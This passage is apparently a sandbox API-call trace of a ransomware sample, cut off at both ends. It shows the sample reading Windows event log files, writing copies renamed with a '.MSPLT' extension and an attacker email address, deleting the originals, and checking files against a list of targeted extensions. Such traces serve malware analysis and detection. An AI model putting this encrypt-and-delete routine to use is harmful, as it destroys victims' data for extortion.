(lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0294.542] GetFileSizeEx (in: hFile=0x480, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=69632) returned 1 [0294.542] CloseHandle (hObject=0x480) returned 1 [0294.542] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4admin.evtx")) returned 0x20 [0294.542] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4admin.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0294.542] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0294.543] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.543] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.543] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4admin.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x468 [0294.549] GetLastError () returned 0x0 [0294.549] ReadFile (in: hFile=0x480, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x11000, lpOverlapped=0x0) returned 1 [0294.564] WriteFile (in: hFile=0x468, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x11010, lpOverlapped=0x0) returned 1 [0294.567] ReadFile (in: hFile=0x480, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0294.567] WriteFile (in: hFile=0x468, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x160, lpOverlapped=0x0) returned 1 [0294.567] SetEndOfFile (hFile=0x468) returned 1 [0294.568] CloseHandle (hObject=0x468) returned 1 [0294.578] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.578] SetEndOfFile (hFile=0x480) returned 1 [0294.579] CloseHandle (hObject=0x480) returned 1 [0294.580] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0294.580] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4admin.evtx")) returned 1 [0294.581] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned 78 [0294.581] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned 78 [0294.581] lstrlenW (lpString=".doc") returned 4 [0294.581] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0294.581] lstrlenW (lpString=".docx") returned 5 [0294.581] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0294.581] lstrlenW (lpString=".pdf") returned 4 [0294.581] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0294.581] lstrlenW (lpString=".xls") returned 4 [0294.581] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0294.581] lstrlenW (lpString=".xlsx") returned 5 [0294.581] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0294.581] lstrlenW (lpString=".ppt") returned 4 [0294.581] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0294.581] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned 78 [0294.582] lstrlenW (lpString=".zip") returned 4 [0294.582] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0294.582] lstrlenW (lpString=".rar") returned 4 [0294.582] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0294.582] lstrlenW (lpString=".bz2") returned 4 [0294.582] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0294.582] lstrlenW (lpString=".7z") returned 3 [0294.582] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0294.582] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned 78 [0294.582] lstrlenW (lpString=".dbf") returned 4 [0294.582] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0294.582] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned 78 [0294.582] lstrlenW (lpString=".1cd") returned 4 [0294.582] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0294.582] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned 78 [0294.582] lstrlenW (lpString=".jpg") returned 4 [0294.582] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0294.582] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned 78 [0294.582] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned 78 [0294.582] lstrlenW (lpString=".doc") returned 4 [0294.582] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0294.582] lstrlenW (lpString=".docx") returned 5 [0294.582] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0294.582] lstrlenW (lpString=".pdf") returned 4 [0294.582] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0294.582] lstrlenW (lpString=".xls") returned 4 [0294.582] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0294.583] lstrlenW (lpString=".xlsx") returned 5 [0294.583] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0294.583] lstrlenW (lpString=".ppt") returned 4 [0294.583] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0294.583] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned 78 [0294.583] lstrlenW (lpString=".zip") returned 4 [0294.583] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0294.583] lstrlenW (lpString=".rar") returned 4 [0294.583] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0294.583] lstrlenW (lpString=".bz2") returned 4 [0294.583] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0294.583] lstrlenW (lpString=".7z") returned 3 [0294.583] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0294.583] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned 78 [0294.583] lstrlenW (lpString=".dbf") returned 4 [0294.583] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0294.583] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned 78 [0294.583] lstrlenW (lpString=".1cd") returned 4 [0294.583] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0294.583] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned 78 [0294.583] lstrlenW (lpString=".jpg") returned 4 [0294.583] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0294.583] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0294.584] lstrlenW (lpString="Microsoft-Windows-TWinUI%4Operational.evtx") returned 42 [0294.584] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-twinui%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0294.602] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=69632) returned 1 [0294.602] CloseHandle (hObject=0x37c) returned 1 [0294.602] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-twinui%4operational.evtx")) returned 0x20 [0294.602] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-twinui%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0294.602] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-twinui%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0294.603] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.603] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.603] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-twinui%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x468 [0294.603] GetLastError () returned 0x0 [0294.603] ReadFile (in: hFile=0x37c, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x11000, lpOverlapped=0x0) returned 1 [0294.609] WriteFile (in: hFile=0x468, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x11010, lpOverlapped=0x0) returned 1 [0294.612] ReadFile (in: hFile=0x37c, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0294.612] WriteFile (in: hFile=0x468, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x128, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x128, lpOverlapped=0x0) returned 1 [0294.612] SetEndOfFile (hFile=0x468) returned 1 [0294.613] CloseHandle (hObject=0x468) returned 1 [0294.621] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.621] SetEndOfFile (hFile=0x37c) returned 1 [0294.623] CloseHandle (hObject=0x37c) returned 1 [0294.623] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0294.624] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-twinui%4operational.evtx")) returned 1 [0294.625] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned 50 [0294.625] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned 50 [0294.625] lstrlenW (lpString=".doc") returned 4 [0294.625] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0294.625] lstrlenW (lpString=".docx") returned 5 [0294.625] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0294.625] lstrlenW (lpString=".pdf") returned 4 [0294.625] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0294.625] lstrlenW (lpString=".xls") returned 4 [0294.625] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0294.625] lstrlenW (lpString=".xlsx") returned 5 [0294.625] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0294.625] lstrlenW (lpString=".ppt") returned 4 [0294.625] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0294.625] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned 50 [0294.625] lstrlenW (lpString=".zip") returned 4 [0294.625] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0294.625] lstrlenW (lpString=".rar") returned 4 [0294.625] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0294.625] lstrlenW (lpString=".bz2") returned 4 [0294.625] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0294.625] lstrlenW (lpString=".7z") returned 3 [0294.625] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0294.625] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned 50 [0294.625] lstrlenW (lpString=".dbf") returned 4 [0294.626] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0294.626] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned 50 [0294.626] lstrlenW (lpString=".1cd") returned 4 [0294.626] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0294.626] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned 50 [0294.626] lstrlenW (lpString=".jpg") returned 4 [0294.626] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0294.626] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned 50 [0294.626] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned 50 [0294.626] lstrlenW (lpString=".doc") returned 4 [0294.626] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0294.626] lstrlenW (lpString=".docx") returned 5 [0294.626] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0294.626] lstrlenW (lpString=".pdf") returned 4 [0294.626] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0294.626] lstrlenW (lpString=".xls") returned 4 [0294.626] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0294.626] lstrlenW (lpString=".xlsx") returned 5 [0294.626] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0294.626] lstrlenW (lpString=".ppt") returned 4 [0294.626] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0294.626] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned 50 [0294.626] lstrlenW (lpString=".zip") returned 4 [0294.626] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0294.626] lstrlenW (lpString=".rar") returned 4 [0294.626] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0294.627] lstrlenW (lpString=".bz2") returned 4 [0294.627] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0294.627] lstrlenW (lpString=".7z") returned 3 [0294.627] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0294.627] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned 50 [0294.627] lstrlenW (lpString=".dbf") returned 4 [0294.627] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0294.627] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned 50 [0294.627] lstrlenW (lpString=".1cd") returned 4 [0294.627] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0294.627] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned 50 [0294.627] lstrlenW (lpString=".jpg") returned 4 [0294.627] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0294.627] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0294.627] lstrlenW (lpString="Microsoft-Windows-User Profile Service%4Operational.evtx") returned 56 [0294.627] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-user profile service%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0294.628] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=69632) returned 1 [0294.628] CloseHandle (hObject=0x37c) returned 1 [0294.628] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-user profile service%4operational.evtx")) returned 0x20 [0294.628] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-user profile service%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0294.628] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-user profile service%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0294.628] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.629] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.629] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-user profile service%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x468 [0294.630] GetLastError () returned 0x0 [0294.630] ReadFile (in: hFile=0x37c, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x11000, lpOverlapped=0x0) returned 1 [0294.635] WriteFile (in: hFile=0x468, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x11010, lpOverlapped=0x0) returned 1 [0294.638] ReadFile (in: hFile=0x37c, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0294.638] WriteFile (in: hFile=0x468, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x144, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x144, lpOverlapped=0x0) returned 1 [0294.638] SetEndOfFile (hFile=0x468) returned 1 [0294.639] CloseHandle (hObject=0x468) returned 1 [0294.645] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.645] SetEndOfFile (hFile=0x37c) returned 1 [0294.647] CloseHandle (hObject=0x37c) returned 1 [0294.647] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0294.648] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-user profile service%4operational.evtx")) returned 1 [0294.648] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned 64 [0294.649] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned 64 [0294.962] lstrlenW (lpString=".doc") returned 4 [0294.962] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0294.963] lstrlenW (lpString=".docx") returned 5 [0294.963] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0294.963] lstrlenW (lpString=".pdf") returned 4 [0294.963] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0294.963] lstrlenW (lpString=".xls") returned 4 [0294.963] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0294.963] lstrlenW (lpString=".xlsx") returned 5 [0294.963] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0294.963] lstrlenW (lpString=".ppt") returned 4 [0294.963] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0294.963] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned 64 [0294.963] lstrlenW (lpString=".zip") returned 4 [0294.963] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0294.963] lstrlenW (lpString=".rar") returned 4 [0294.963] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0294.963] lstrlenW (lpString=".bz2") returned 4 [0294.963] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0294.963] lstrlenW (lpString=".7z") returned 3 [0294.963] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0294.963] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned 64 [0294.963] lstrlenW (lpString=".dbf") returned 4 [0294.963] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0294.963] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned 64 [0294.963] lstrlenW (lpString=".1cd") returned 4 [0294.963] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0294.964] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned 64 [0294.964] lstrlenW (lpString=".jpg") returned 4 [0294.964] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0294.964] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned 64 [0294.964] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned 64 [0294.964] lstrlenW (lpString=".doc") returned 4 [0294.964] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0294.964] lstrlenW (lpString=".docx") returned 5 [0294.964] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0294.964] lstrlenW (lpString=".pdf") returned 4 [0294.964] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0294.964] lstrlenW (lpString=".xls") returned 4 [0294.964] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0294.964] lstrlenW (lpString=".xlsx") returned 5 [0294.964] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0294.964] lstrlenW (lpString=".ppt") returned 4 [0294.964] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0294.964] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned 64 [0294.964] lstrlenW (lpString=".zip") returned 4 [0294.964] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0294.964] lstrlenW (lpString=".rar") returned 4 [0294.964] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0294.965] lstrlenW (lpString=".bz2") returned 4 [0294.965] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0294.965] lstrlenW (lpString=".7z") returned 3 [0294.965] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0294.965] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned 64 [0294.965] lstrlenW (lpString=".dbf") returned 4 [0294.965] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0294.965] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned 64 [0294.965] lstrlenW (lpString=".1cd") returned 4 [0294.965] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0294.965] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned 64 [0294.965] lstrlenW (lpString=".jpg") returned 4 [0294.965] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0294.965] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0294.965] lstrlenW (lpString="Microsoft-Windows-Windows Defender%4Operational.evtx") returned 52 [0294.965] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47c [0295.105] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=69632) returned 1 [0295.105] CloseHandle (hObject=0x47c) returned 1 [0295.106] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4operational.evtx")) returned 0x20 [0295.106] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-windows defender%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0295.106] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47c [0295.106] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.106] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.106] CreateFileW 